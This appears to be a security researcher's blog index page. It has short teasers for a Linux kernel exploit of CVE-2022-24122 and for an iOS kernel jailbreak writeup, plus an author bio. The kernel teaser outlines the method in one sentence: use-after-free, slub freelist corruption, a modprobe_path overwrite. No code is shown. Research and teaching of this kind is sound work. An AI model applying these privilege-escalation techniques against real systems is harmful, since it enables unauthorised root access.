for the first time I exploited the kernel in real life. I used the bug CVE-2022-24122, which allowed a use-after-free due to bad use of refcount.
the exploit itself requires a kaslr leak to prevent an oops during the process, as well as access to user namespaces. it is not really reliable, needs many tries :D
to get root I corrupted the slub freelist and wrote to modprobe_path.
the exploit code can be found on GitHub or in the following:…
in this article, I’ll present a detailed ios jailbreak writeup and some basic tips and tricks on how to set up an environment for exploiting. the bug I am exploiting is in the iOS kernel. I hope this is a helpful reference for anyone who wants to start with iOS pwn
now let us begin! short story:
a few weeks ago, I found an old iPad 3,1 by my dad. I wanted to set it up for homeschooling for my sister, but the iOS version was so old, that I was unable to download anything from the AppStore.…
note that this is only an early reference that I initially created for mysELF. I decided to publish it for those, who want to have an overview of the fundamentals. if you spot any mistakes or if you think something should be added, please reach me on discord (bitfriends). I used some pictures from other people because this was only a reference for me. the people who created the pictures are amazing and should feel honored :)…
I like programming and low-level, do vuln research, pwn stuff and play ctf with r3kapig/ARESx/FMC.
When I’m not using my pc, I enjoy spending time with music, playing airsoft and working on motorcycles.…